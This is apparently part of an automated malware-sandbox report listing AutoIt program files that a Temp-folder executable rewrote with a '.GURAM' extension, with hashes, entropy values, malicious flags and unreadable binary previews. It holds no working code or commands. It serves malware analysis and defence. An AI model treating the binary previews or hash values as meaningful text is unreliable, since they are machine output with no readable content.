                                                                                                                                                                                                                                                Entropy (8bit):7.922462502171897
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uDYZN3IM+EEOFWllnaMgpO3fUuE6Wguqo/idPYE00UAzU4o0jZtwFta:uDYUlEanaX03DEOuqo/iGX0XzdleFta
                                                                                                                                                                                                                                                MD5:20D84F6D515252A30313BD6938CF2DFA
                                                                                                                                                                                                                                                SHA1:D384C2F7275D075AEBE433CBCFF49D8E263925B9
                                                                                                                                                                                                                                                SHA-256:8C71B4C615DC4F4FB3A13FC79DFA7390491DB9142B63634870170F761A807B6C
                                                                                                                                                                                                                                                SHA-512:50B8079DD276BB4523D35CE6D7530A4C6CDF63623851856BA78E725D3EBF53C219A28A5A7B3BAC12AF79BC2793503DDCE9801A0ACF3EA328901F9D93B411BEEC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:U....PN..]..{).?.6.-....F.C..r.0Ti3z...A.U......k.O.....bv.^Y.K...Q.D......\...k.[....b../.|..M...V..c`x.[.c....?/.w.../Nz..'.Z..Sr......i.......y..C)=TO..........f^.j..^R...S.3\....V...iYGu2v.3..<..|.;..?_.T..i]]..ZiF.c.A...|.....u..W.....x..&.;....{..k.l9..B...:..%...<..y....4..jx....\N....sX.g\.d~...i..s..!.........;F..].<c..([..;7..L1,......N.}....q.....2Qc..Pj..r.I.o.T..........5..v..%.f........i.(/.!n.....(xm.....5..3..Z..G...... e..Yr...@3G .{.....'+.m........9....'h..8.9.o.D(..z.4.l.N.@.E..h.....9.&]....?g"R..kS..];q.....j.b.j.#.?..E..-..\.t..../..l..a.Qr......,./...5Io..%..6x...D.F....p=..y[i......2.@H...@...x...O...y......m0,....zH..[..y..ZO`..*...]..ekQ+...j.h.b..ix.....]..._E".0U..Mz...7..Y.-.tTa.....D..,.l..s..<....g.....3}v.0..g..o.l.b].S:r6..cX...d#*Qd.r..)#.c.B........2Y..M..)...........h....XyD....4....z...`..D..].{..k.)v U...6..3(C..|....E.J*.9.:.\.>.....<.S..._.'.X.Q...a.S.......H..-.{...R..f...^.I.-..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\msgbox.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1067
                                                                                                                                                                                                                                                Entropy (8bit):7.821230486730415
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:nQ+IVPiM5d6tVchOjqJKrvYjmJrc0YXUZtwsTt:ZwiMD6tVXq+u4o0jZtwq
                                                                                                                                                                                                                                                MD5:93B37E8A68CB2452AF7D79217D8A1127
                                                                                                                                                                                                                                                SHA1:9F266B6EC0724795C28AA7791E700D9F2FD5EBC2
                                                                                                                                                                                                                                                SHA-256:E39C2457DAF9FFCBF307627E79C0F19F8DBB15447A5E885B4EDC14B2B328BECC
                                                                                                                                                                                                                                                SHA-512:20735AAC8567B35F868ECE987EFAB1DC5599377E9BCBB3AE5F2A69728F7170DE34DCDF630D2A6BB9C634880AA30A0667D7AFE2870BCBD54C91D86208E534F876
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.7..9..R.9........4V..B.!j.w..r...v"i....."....[..f{T.h.....q...R..K7yh...<M.z.C[o..R60...o!..Gm$..l...r~b.K6...*c|.v.W3zuSZ.@3{TY}......#...'....D.@$.f..(...._O...].g.x...>......6...D......y.y%..l..||c.y..@m....Y..u.+KgvJ<U*.9Q5.W.7.E.........H....J...m.<~.i.7.\\]7......$9t...;.:.4.^0_.WG....^.o.....v.?..<.?w....x.r.?X.U;....o..nX.u>@.$cu.7..3(.l@)k..JP..s...."....Rqc.3a....0....{..Kt7........Zu....'HeX......$.J.o..<#.......1..}\vO!..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\notepad1.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2446
                                                                                                                                                                                                                                                Entropy (8bit):7.910950902572371
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:6HUfVCdJPPTHUj4Lf5KGztL1vLluY/zI4o0jZtwW:KGC7U6f8GRZvLkY/FleW
                                                                                                                                                                                                                                                MD5:DD8B7B35744B48A0643677B24D99EBF8
                                                                                                                                                                                                                                                SHA1:5C87EB947777E1A7A2AC5F0AC408C167B030E79B
                                                                                                                                                                                                                                                SHA-256:3B5BB3CDDEDA244AE10017226FFDC6726CC20F3CC5CF45E6157544F15A7885DA
                                                                                                                                                                                                                                                SHA-512:206C52E85834086754ADE53907E7B012A1162613A82F25FB85D4C85F585088D7AFDC65DFEC0B4A42EF8FA78E6F4CA8A22BBA66CBFF4F28F779CB5C1D7F01FC21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...aLn....a..&...$.k.D....h.[..X.a..D0...E...T.J...Qj.I.F.l.?R$q.g4...~..{..7.M..]ME.<{.t...f_W,....a(..........`..&oQ.z^.K.k0:X8.Lgql*.....7............&.>..U....<..|.F[....rc....#.../Y.v...D&.G.W..?....v..9*>.N..F.Z.....S..d.....>.......V..=n.(....J...UV......D...>...b>Hf.q..J~.H.b.l.1P*a.@Z9k)B... .j.C?!...gP...vZ:..,..H.].....t2.P.0..;.:...g.|.3W..~.K..O47.....8+.='.,t... .>....Yg))....Q.y)..!.1..d.WY..e..9.E.d`y`<.....P#...Ic.,Q.W....a.r.....!..ee.L.....$Z..h....d....Jd.1...>`....E..@.S.7..p.g...S....uh..P4Ip....3...._.^Y$?..".......~.........y..r.).H.....k..S..q....eN....q..Q%...5J......M.u ..8.. .......<+.../.h.....!wnT....4....K..L..2:/....ni.>...I_.P.~S.....9<..........D.II.......6u......\....T..?....dCH.zj.p.>Au#.IU...p.....6.l..|JN.C..7..rMi.N...[.w....(>Bre..........ztlg.V~...3.B..8.b.:..C..P.JA..'..l.8...Qwz....sX<2,B.3..Y..'...#.........6$h..L...%}.Je...~.........s..?z...S....j..t].T..U..Xz....._..{..O..U^B..R.>.R...}. ....6

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\notepad2.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2156
                                                                                                                                                                                                                                                Entropy (8bit):7.907891683642084
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:oeinTakFeviEH4wIO7paU53XcKwK4o0jZtw7:1z6S6I70UdXcKole7
                                                                                                                                                                                                                                                MD5:88AB97F737C12AE671DFA33EE946A78E
                                                                                                                                                                                                                                                SHA1:0FEC4DF7BA0115EE4FACE1C0C9CB1909245593EB
                                                                                                                                                                                                                                                SHA-256:B26D7A5BF5EAE278F836E8447C3620D344494A1063E628AE47A8EB8914EE55BF
                                                                                                                                                                                                                                                SHA-512:65616E09C7BEEAD5621EBCE4566AA46DE9E078B90936FEF3064DAE2916D523A69A7F73D7751818501CA708AFF750F3C16F5D8B873AC0C04F370A179720738D03
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...LO);.c.....j0}...ba;2G......V=.w..C........1?O?...~E.X.&..5._....*...K.,^..f..@. .'......".`..6...~..v.r.mIAb*.........a\.E...<...z...O.$xQ..B..Nf>f..*.V:n..VP.K.....V....MUn..T....!.....<uF.9.....{.L.%..*....^.A.z|.n>.....tZ.Ut.u..O..........5W..}.t.....r...#...\.%.8..*.`....._Pl../../....ki]..... b./..Q.....".....b..-.tP..S....H.nU........B........w<.*..p..h.~Fyr..`bD~..7.j....."..POi6...........t..4........`f.2`.q.G/..4.@.. <m."ha.C_...c6x.V\....._..6q.R.+.9.&..Jp\..6..\.R.7&....<.+Cz.0.....!.=.8bp...[M.`h.Sq.Y.KcCM.....s....7G......|l.$AY<&..,...E.=.U./.?..?...DD.$%U....Ie..A.e#.J.....ED.=.3..'..4\.C.c.=..m4......S.M..x<..c.a_........Rr.>.Z....."u....P.....l.V..../.Z)@Z...M...`K.....<.:.....Tf.....G. Pq....$.<R.(......-,.s.c{...,5.q'.......|..Nu.:.+..4...a.q...n.$.o6.N..I...j....f.=.rv.=..a..Wm..>....0.Y.c.y.>L..b?.jX^...4.*og.".'...73d....6$.....R.M..h.=W.E.KQ...8.=).qqW...B.m..$..\.?..gJ~G7.Pm.7......1....%.@.9:V.U..,i

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\AutoSQLiteUpdateIt.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):34452
                                                                                                                                                                                                                                                Entropy (8bit):7.99442096964343
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:L+Iv/SjDHIPFhddDulcquijXiBVONSecWBXqNZC:LDZ3gXuiLMO8ecQ7
                                                                                                                                                                                                                                                MD5:2E86ABBB8BDB99FCB5292F1495BE8B6E
                                                                                                                                                                                                                                                SHA1:073BE718DD76E81D05169AEAA802FE934A783F9E
                                                                                                                                                                                                                                                SHA-256:CE7506B3A5007229F41AFF7DF1FE4A48E1960B4920D46A8318A9247A80DA1160
                                                                                                                                                                                                                                                SHA-512:BD6626E59AAB2B207A95E59DF9648A7E6C1D4C4AA1357E949618BFB070A198C7387ADD033DC24EECE6729CFD694129469EF7B264206EFC5BEB4B5896C3AD752B
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.#:f.A.w.'7.8Rz%J...............k1..w.]..6u@....Z.Oz......LH.........'`..a@(D..1..l...h....O.....L..W.T0..-8|.0..7...f..7....U.x....u.>ax..#,^...1:.M..H^.[.....9....y.......6>......f.b..9....M$.Z....v....KoQy7..@......;I. ............c"......$#.$.........l..kcqJ>...'a...f.d..+..g...Y....-.;hY.P.P...i....H'....'a.%EI.})y..8.V.u.i.^.5.6.Z......_G}..a..._q...1.{......Um/.K....-a;..TS.........~.......@ ..8p..vw3..:...S..%.xw.ab..x.......v....|.p^.G..`T.D.....l.......E..y1..AX.....1c...<...d(~m)K.!.....N....lwK....%..4........".J'.R..q.Wsy..H...a..m.G...m../.^}.K#xk].'..g.]}T.!......0...Ww..u...Yr....+....+.B......tx.O.MEU.a.|......W...IU..{3.._o...E'.\.w.Rj!o/....n.!,...C?.....Mb..!h.)..!p.(6...[...G..S...<.H.$E...-......L...!...O.,..m#..c.G}.p.J.v{..+W.J...p${.K...GM......vW`.]...b...`e;....@4.......#z\...m..p5........T#....t... ..|V3!.b..qdD......Bp...Q......<..;G:8..%.n.k..iD..$. .+...E..l`v....-....\..H..DJW6l.....`.....*4s.,.K.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\AutoUpdateIt.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):30127
                                                                                                                                                                                                                                                Entropy (8bit):7.994754101198133
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:A0920hTyq9G3hzJVtfNBUgTddbQtgnDV5dqGfc9QR4G:n20hTyd3h9VvZ3eYj
                                                                                                                                                                                                                                                MD5:6C4A2FA5D279D0CC2B7CEBB69A225357
                                                                                                                                                                                                                                                SHA1:E118FF38D249D9614C9A088F1A922E50E8F3A8A5
                                                                                                                                                                                                                                                SHA-256:E3297135CE7B577DC4105172B9BAF8A13DB91F530D4F60E75BADA58B9A4CB305
                                                                                                                                                                                                                                                SHA-512:DB27798FC23CA9F2D79ABD87531A877C114425106AC6F89AB0FECA45A9E16A2B19403A8BA783C2103070E1B6CC4AB0CCC28B0686F190194EF1E23659AB63CAC2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...[1@/{yd.O....|....R.l.D...A._.S.:2?.|..8.z..Q..\....<......H...X.x.2T..q.~O.n..]x..[..b../I.ZPz..?F.....i.....V..j..v.=.=.MC...'..@.~g.z..........D ..0C+...V.c..T.-#..x..N+.S....n9...).g.Sz..u.C.......<...>..^.L....[(........aQ....|Al!...L".|.0}.e..i......f$..z...Ly,.N.!n3.!.0..up ..ro.i.L...4O..v.G..k....I....1.....c....h.... .....'......@.`....8....^1...W...%.J..K.....%%"..P..[.....Z..S....W..W$.....a...X.....!......."...oP..Fs~.Dr<.....<.....9..X2..ZP"Y~NCe....+.Kx.e..byw..t'....Y.E..E....4....,z./b.W....-1...=.w..);&a....i...uGR.o........_.....0.i{...e.._..+)......Xhs...t.BO.^.j...7\z..F.=..r>....>.#m.mt...f...f.iK.p..UGx...g..F.Z......8...c!.FI."[.....e.c_8`<.....6..1d.u.O.G....[..-+).P..,-'R.Nf.J.....`..x?.8...\......B.....+$4....}.).>...0C......v/..=.*.Q;.xe;d.Qz.;.........V...........pc.]9VY^......m.}e-..A..AQ5....q.L......<E.C..B...e6..T.......A6Z..j.=U"..W._]}..G.~o.`.#.y..]..&..jy.6.W...9.))..{..<_=...M....;Q.ZL.z$...^...)Xl.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Extras\Editors\_ReadMe_.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):794
                                                                                                                                                                                                                                                Entropy (8bit):7.690971366242492
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:2Ln8imZzFEBtOdrgjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZmhR:2/mwbOdEjmJrc0YXUZtwsTqfdp
                                                                                                                                                                                                                                                MD5:2FE3EBD5D2DB13D18B1B1693DF935AD3
                                                                                                                                                                                                                                                SHA1:0E92A44A7F9B0E4BBEFACD7280F17ABD8267455B
                                                                                                                                                                                                                                                SHA-256:501F53B6122530619D94BFAAAFC81652192B818F0B02414FFB657FAD2AEB1641
                                                                                                                                                                                                                                                SHA-512:DA00724C167C1044E87F6814EF30AE797EAB3EC8E8D1A2C43AA6193DC63937C126460D2BF0609CA9309E805D7CC5554E66AFE78DE391DA9444D74B6BD6F06F45
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:I>.....P...).8....^..v.>HV..>n...'O..x0..$..U+8...........X.......pu..a..{..w..].....Q...c..\..........O..b~.\..R...r...d.5..1..g.-F..J......{.....:..N.O'w.pp.k.......p..j<8.....F..!.h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......l...T...~.lvd..l.>2Z.....s..[....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Extras\Geshi\autoit.php.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):125931
                                                                                                                                                                                                                                                Entropy (8bit):7.998537223946157
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:A/MUw8s/R4pIM4IhEGaSLEwI8nkFBaQ3bi4QwM/wr:SMoI4KM4sREWkSR4QwgU
                                                                                                                                                                                                                                                MD5:3C3C2C2526185EEC6E217C6C31BB6BD1
                                                                                                                                                                                                                                                SHA1:13EDD8D7C7717C839D9E4A8417D6783815CC3E0A
                                                                                                                                                                                                                                                SHA-256:E5B9913A741644FCF784B11A78026F1BA0286703DDB24DBD294147F5D6A28D2B
                                                                                                                                                                                                                                                SHA-512:7A6865E713612A7177656F1350012E6BD5689A696922B49FCC68044C25CD2B6046620C8DBBDB2EE45E3535EE4F5E63F96875CB881F50744746E699C9BD3740D9
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:e..1J.....D$.......%.^D..s...B...../...k.......t....'..,'.{...E....P.vs.....M....G..le..'2....Jc....h.`....~...l.p<..V.....?.r_..R_.L).y....KO>...\...e...J..}p....R..&.z......i/&m...-f.%..y..M..l..`I.......+.`.e.....l(...n.D`...Cv..(..@..L4..n... .[,Y).a..z...VaU.^.)...:............<o:....5...I..n..LF..BC.B....xi.Q.....z........8..../..[...7...O....}.....i.4iE..#...).V...*..p..oe.....E.m..9...5;...f>..;?..Ib..h`.?..U.e}.....$...._..pk.j. .JS^3W0.H'.[`...7..'x.=...7?......-gN..F.G....y.....h*..q.N..i.~.W.*........^..yo!.f8......Ybk..nP.B.L+.qM.>.*..g;..Pi.e.r....k\...).%^t.......~..B{&.2.R......V.H.,..K...#K|.X.q.37Cq..9|2<d2#.T...o.:.f6...Y.~...c...a..o..J....L.....V/..E....(..=.^.C..u...vSH...y.vn]..v:...'...gcc...\....xCul..KDH".h.l.Q..#*9.B.........9........$.X.....8.......W.|.......Y.X2.O;{O72....u.d..1..%...;Yu..}e.....8..G.=..F.....K...8..r.L.o...EfD.......8........y;..u..\\t.8...aL..1.$U.^........V../.,I....Wn...5..~...5+.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Extras\Prettify\lang-autoit.js.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10045
                                                                                                                                                                                                                                                Entropy (8bit):7.983576811450976
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:YOXnlmwVCM3uk7MHG4pMd2qD0I2f6YXOypz2IBSSFjVAJMrBfXUUm:HNVgHGiMjD0I2nOyxAsNm
                                                                                                                                                                                                                                                MD5:831B0874357574C37F666C2095D74E87
                                                                                                                                                                                                                                                SHA1:6303DE574E45D874367B7D846E922928C8589DE6
                                                                                                                                                                                                                                                SHA-256:8AAD605E9982366518B1B156596EBACD53AAF8B9BD3B09FCDACF910B1E91BE63
                                                                                                                                                                                                                                                SHA-512:95B32A203ED1DD3805D88189C89CFE8B710277B56452F64DCCB1E39B6BC385958D72A59BB986D0498BEE1CFA8531C9096B3AFF6DE9E0CEF8C3EC45255F54CA07
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:P.e./#.y.....(.....<.&~.\.6........Q.`..)....S...$..t..b..p...|.P...{V5h^E..;1.d....3G@......8L..y.v4..i@.c..w..T.......H....0@..1.dO..5..y.......m..x...AYJH./I.@...,..5./....IY.z...-...7.).].k...Y.d.Q....2hi.A.1n.y.g.E}$..m....|ga.\.Wu...%..Z.5...f0.0. ...p.8....@....8.......#+.....u.~g..'.BS.La...V.i6.m4.d...zKM.NA.'K..'=JK....2..6...?IH..z....X.*.LJ..,...wr.......N.....3../..@...._x_>.C.F..<....;.V>.6.?.....8.j..$...w.!.i..u.y.."!.....L.%....]...G.]<(.p...B.t.`....b.......?......_.q..x.%O...I.oJ.7.xG,G.b..."fjt.....\{.(-...a5s._/>...0.....3.{r.`z.wyt. ..|:5.].R../..\....t.8m.........-...R.q\..Ri.......Dv1.|t..... ....(..P..o.o0......o.0...`?.......//..;.\ 0...^.o.=]*..D....?8.FR......:../..C...f../......ew<......V1....A9. UX.....L....lS...][>.N.z}._.&"..r....F...?q..K.|.....X.H.S....L.!.F...B....&......&...W.J.IVr..O.'..O..m:...8... e.....g?CS5:TU.`...5.....J.N.......B...-.!.e6.e.d......6Z<.y...2..q........m2."a.c........k..R!.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Extras\Prettify\prettify.css.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2194
                                                                                                                                                                                                                                                Entropy (8bit):7.89947997409468
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:H70mZ8Y7WfIXuMccJV8kWMBHyIy57fu/Gz9NBdPjT0L1H4o0jZtwZY:HVZ1CfI0aV8kWMBSf5D6G9zdPjoRklem
                                                                                                                                                                                                                                                MD5:8AE465523315AD5EA5C6DA12C7846C93
                                                                                                                                                                                                                                                SHA1:A629A6366AAB4ECBC091F4BCC3299906366D5950
                                                                                                                                                                                                                                                SHA-256:DB172CC995FE100F78B03B92F6BB2422AF1D89765D1F2B512F9F95BEB1E612F4
                                                                                                                                                                                                                                                SHA-512:0735BCD6BDFA81C9DF7527CD09D0A46509F5F842D9566D5178F976FAC60E7965D6342AA6C963A332848959A1D529C00E5B0D087D5DF77B9921299565620270CF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...*.......9..].f.R........Qf...@..b.X..u..u..J...R^V.g.......M:6...%.(;..>jCX...)B..l...K..zB..=~.3...4.K/.pn...;2.M.P.,....#R.4A:.9.D!...k....W1...Z...K...s3Wp@&w..c.k.._.T..Y.kG9~.W.+.....y..s.k...H..N9_.....u..v.."p.C.q.......I.j.....U...*....34t.*..j......~..[.-s.a....h..:.d`....~.....1./-g..K...H...t.$....G.b....$.g...!.xP...^..2..=. 3O{..R[}z.?..).......4....P.R...B/'$'.@..m...2..Y_v?o...Z...@<\...`f3...h....Z.2.\...\.>.zna.....[n..ym.W3L.k6.||40.+fl...Kn.HcU..R.S...3.i.k%...x.\..&r..[........A.....:...GU{...}.r.=z.=E#.Es...m.!.h.2.[!P.....d..J~p...NY`sW.S....G`{!...U..~z.9....)...g....RJ H..U.......p.k.....7M...c.f..........9KA'5.|.L... ......c.!..?...Q.8..$..U...Q.{...{..tSs...\.W/......0.,|....U...@..%9].&.......Y..H..H*.R..{'..q..........H..QJ}.(4./SD...N...^.....o@._z_MX.V..".o&U....G.s....x.+...Jw3j........'.^8..Z...|,..BY.\$k.V...v.*.."...p_.^(fZE1..>...3?..=f.+...s.....3&.....R'...KV...1V..k.@.!A........r.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Extras\_ReadMe_.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):785
                                                                                                                                                                                                                                                Entropy (8bit):7.7361094727849045
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:SgGWNcDmFEArlKmNmTS2DuMV9jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkX6:Sg/NWAyTS2N9jmJrc0YXUZtwsT6
                                                                                                                                                                                                                                                MD5:95ACD33F99D02F847F10D6BE472A2DF5
                                                                                                                                                                                                                                                SHA1:83EA42CDCB63488509DAB38B13C2F5002B04F831
                                                                                                                                                                                                                                                SHA-256:1D750FF5084E54A40843CE1B99C6D2165BEE1C48FC42DC9B2B235E90BD8A6C93
                                                                                                                                                                                                                                                SHA-512:53595312360086B193CF85708A4FE8B89A6714761376684F1346E32F3EC8D798D4F5CFD2F06793F5BD5452F28F9FEA844A50F0F42A9F83D41361F70EFB61A158
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.M...J..R.0...a..mU.k..jp\r.I.a.!...O.5.=.k"8a:0.. .Z.H0u..?u...j.^......x!..q.....wS7tV..s....T..E:ci._R.A.{#t.n.......".,V.......,....1%......:.%7`..CB.*..>....3.........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......o"..8.....X...0?K..;c....6......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\SciTE\SciTE.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2373216
                                                                                                                                                                                                                                                Entropy (8bit):7.227769305910325
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:VSXoV72tpBsGwi1aCvYdutluS2K4fYw44RxLh:k44wiICvYsuBB
                                                                                                                                                                                                                                                MD5:798741C857B9ED03A31B5FC189DF29B6
                                                                                                                                                                                                                                                SHA1:F2BB3EEC0A6D5F4309C79005C7FD6EEF66A849FD
                                                                                                                                                                                                                                                SHA-256:65EB9FAD8CA9714BE92F76DEC667DAA82E291C5AC76C019890AB9E68C4FFF1A1
                                                                                                                                                                                                                                                SHA-512:405353BD3493CC90D0D33124A1BF9907F65359BE7D7C01245E56A2B5249E3BE86EA9E036F935116B0DA90464759C6B549780A9D0587FFCE414EF0B09F783D205
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
